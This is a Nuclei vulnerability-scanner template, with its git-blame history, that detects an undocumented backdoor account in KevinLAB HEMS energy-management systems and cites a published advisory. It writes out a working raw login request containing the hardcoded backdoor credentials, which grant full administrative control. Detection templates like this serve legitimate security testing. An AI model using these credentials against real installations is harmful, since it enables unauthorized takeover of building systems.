nuclei-templates/vulnerabilities/other/kevinlab-hems-backdoor.yaml

id: kevinlab-hems-backdoor

info:
  name: KevinLAB HEMS Undocumented Backdoor Account
  author: gy741
  severity: critical
  description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
  tags: kevinlab,default-login,backdoor

requests:
  - raw:
      - |
        POST /dashboard/proc.php?type=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Connection: close

        userid=kevinlab&userpass=kevin003

    matchers-condition: and
    matchers:

      - type: status
        status:
          - 200

      - type: word
        words:
          - '<meta http-equiv="refresh" content="0; url=/"></meta>'

      - type: word
        words:
          - '<script> alert'
        negative: true

      - type: word
        words:
          - 'PHPSESSID'
        part: header
Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 17:48:31 +00:00			`id: kevinlab-hems-backdoor`

			`info:`
			`name: KevinLAB HEMS Undocumented Backdoor Account`
			`author: gy741`
			`severity: critical`
			description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
			`reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php`
added more tags 2021-08-07 18:57:18 +00:00			`tags: kevinlab,default-login,backdoor`
Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 17:48:31 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /dashboard/proc.php?type=login HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`Accept-Encoding: gzip, deflate`
			`Connection: close`

			`userid=kevinlab&userpass=kevin003`

			`matchers-condition: and`
			`matchers:`

			`- type: status`
			`status:`
			`- 200`
minor update 2021-08-07 18:50:56 +00:00
			`- type: word`
			`words:`
			`- '<meta http-equiv="refresh" content="0; url=/"></meta>'`

			`- type: word`
			`words:`
			`- '<script> alert'`
Additional matcher 2021-08-07 18:52:55 +00:00			`negative: true`

			`- type: word`
			`words:`
			`- 'PHPSESSID'`
			`part: header`